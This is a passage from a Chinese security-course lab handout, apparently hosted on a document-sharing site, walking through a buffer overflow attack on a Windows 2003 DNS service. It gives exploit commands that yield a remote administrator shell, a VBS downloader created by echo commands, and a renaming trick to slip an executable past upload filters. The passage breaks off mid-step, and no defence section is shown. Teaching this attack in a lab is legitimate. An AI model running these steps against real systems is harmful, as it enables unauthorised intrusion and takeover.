计算机安全技术TOOLS教程课件5.4.2 实例:缓冲区溢出攻击及其防范.docVIP

计算机安全技术TOOLS教程课件5.4.2 实例:缓冲区溢出攻击及其防范.doc

  1. 1、原创力文档(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。。
  2. 2、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载
  3. 3、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
  4. 4、该文档为VIP文档,如果想要下载,成为VIP会员后,下载免费。
  5. 5、成为VIP后,下载本文档将扣除1次下载权益。下载后,不支持退款、换文档。如有疑问请联系我们
  6. 6、成为VIP后,您将拥有八大权益,权益包括:VIP文档下载权益、阅读免打扰、文档格式转换、高级专利检索、专属身份标志、高级客服、多端互通、版权登记。
  7. 7、VIP文档为合作方或网友上传,每下载1次, 网站将根据用户上传文档的质量评分、类型等,对文档贡献者给予高额补贴、流量扶持。如果你也想贡献VIP文档。上传文档
查看更多
5.4.2 实例:缓冲区溢出攻击及其防范 1.实验环境 实验环境如图5-21所示。 入侵者(0):对028进行缓冲区溢出攻击。 被入侵者(028):是开启DNS服务的所有版本的Windows 2000 Server或Windows 2003 Server SP1,在本次测试中使用Windows 2003 Server SP1。 图5-21 实验环境 2.缓冲区溢出攻击过程 第1步:入侵者下载并且执行dns.exe命令。到网上下载dns.exe工具,可以通杀Windows 2000 Server、Windows 2003 Server SP1系统,将其复制到C:\Documents and Settings\ Administrator,在DOS窗口执行dns.exe命令,如图5-22所示。 图5-22 执行dns.exe命令 第2步:寻找漏洞。执行dns.exe -s 028命令,对主机进行扫描,如图5-23所示,显示出被入侵主机(028)开放的端口以及操作系统,最主要的是显示“1047:Vulnerability”,意思就是1047端口存在漏洞。 图5-23 寻找漏洞 第3步:实施溢出。如图5-24所示,执行dns.exe -t 2003chs 028 1047命令,其中-t 2003chs的意思是操作系统的型号,-t 2003chs即简体中文版的2003系统,如果是2000的系统就使用“-2000all”参数,028就是我们的目标IP地址,1047就是刚才扫描出存在漏洞的端口。 出现“Attack sent, check port 1100”字样,说明已经打开了目标地址的1100端口。 图5-24 实施溢出 图5-25 执行telnet 028 1100命令 图5-26 成功入侵 第4步:成功入侵。如图5-25所示,执行telnet 028 1100命令,结果如图5-26所示,我们现在已经成功的入侵了对方的电脑,并且得到了管理员的权限。 第5步:如图5-27所示,在已经成功入侵的电脑上执行简单的操作。 图5-27 简单的操作 第6~11步介绍在被入侵电脑中开3389端口(远程桌面)的方法。 第6步:创建用来下载的VBS脚本tony.vbs。在被入侵电脑的命令行里输入: C:\echo with wscript:if .arguments.count^2 then .quit:end if tony.vbs C:\echo set aso=.createobject(adodb.stream):set web=createobject(microsoft.xmlhttp) tony.vbs C:\echo web.open get,.arguments(0), 0:web.send:if web.status^200 then .echo Error:+web.status:.quit tony.vbs C:\echo aso.type=1:aso.open:aso.write web.responsebody:aso.savetofile .arguments(1), 2:end with tony.vbs 上面的命令创建一个用来下载的VBS脚本tony.vbs。 第7步:在入侵者的电脑上上传wrsky.exe。把开3389端口的工具(wrsky.exe,可以到网站下载)上传到自己的个人空间。 注意: 由于提供个人空间的网站都对上传文件的类型进行了限制,允许的文件类型及大小见表5-10。可知,不允许上传exe文件,因此上传之前对文件的后缀进行修改,比如wrsky.exe修改为wrsky.rar。 表5-10 个人空间允许的文件类型及大小 文 件 名 称 扩 展 名 文 件 限 制 文 件 名 称 扩 展 名 文 件 限 制 GIF图片 .GIF 1024KB PDF文件 .PDF 5120KB JPEG图片 .JPG 1024KB CHM文件 .CHM 5120KB PNG图片 .PNG 1024KB tar压缩文件 .TAR 5120KB FLASH动画 .SWF 1024KB gz压缩文件 .GZ 5120KB ZIP压缩文件 .ZIP 5120KB bz2压缩文件 .BZ2 5120KB RAR压缩文件 .RAR 5120KB RPM文件 .RPM 5120KB 图5-28 在被入侵电脑上下载wrsky.exe 第8步:在被入侵电脑上下载wrsky.exe。如图5-28所示,在被入侵电脑的命令行里输入:cscript tony.vbs /blog/upfile2/080313214807.rar c:wrsky.exe命令,其中/blog/upfile2/

您可能关注的文档

文档评论(0)

带头大哥 + 关注
实名认证
文档贡献者

该用户很懒,什么也没介绍

1亿VIP精品文档

相关文档